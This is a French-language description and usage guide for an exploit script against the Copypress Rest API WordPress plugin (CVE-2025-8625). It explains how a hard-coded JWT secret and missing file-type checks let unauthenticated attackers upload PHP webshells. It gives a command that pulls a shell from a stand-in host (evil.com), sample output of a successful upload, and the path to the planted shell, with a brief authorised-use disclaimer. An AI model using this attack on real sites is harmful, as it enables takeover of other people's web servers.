
Copypress Rest API 1.1 - 1.2 - Absence de secret JWT configurable et de validation du type de fichier menant à une exécution de code à distance non authentifiée
Copypress Rest API 1.1 - 1.2 - Absence de secret JWT configurable et validation de type de fichier manquante menant à une exécution de code à distance non authentifiée
Le plugin Copypress Rest API pour WordPress (versions 1.1 à 1.2) est vulnérable à une exécution de code à distance via la fonction copyreap_handle_image().
Le plugin utilise une clé de signature JWT codée en dur lorsqu'aucun secret n'est défini et ne valide pas les types de fichiers, ce qui permet à des attaquants non authentifiés de forger des jetons et de téléverser des fichiers arbitraires (tels que des shells PHP) via le point de terminaison du gestionnaire d'images.
Nom du script : CVE-2025-8625.py
Ce script Python automatise l'exploitation de la vulnérabilité, vous permettant de générer un JWT valide, d'envoyer une requête spécialement conçue et de téléverser un fichier malveillant (webshell) sur le site WordPress vulnérable.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url : URL du site WordPress cible-shell / --shell : Lien direct vers votre webshell ou fichier PHP malveillantExemple de sortie :
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Shell téléversé avec succès ! 🎉
Exemple de chemin du shell :
https://target.com/wp-content/uploads/2025/10/shell.php
Cet outil est destiné uniquement à des tests de pénétration éducatifs et autorisés.
Toute utilisation contre des cibles sans autorisation explicite est illégale.
Par : Nxploited (Khaled Alenazi)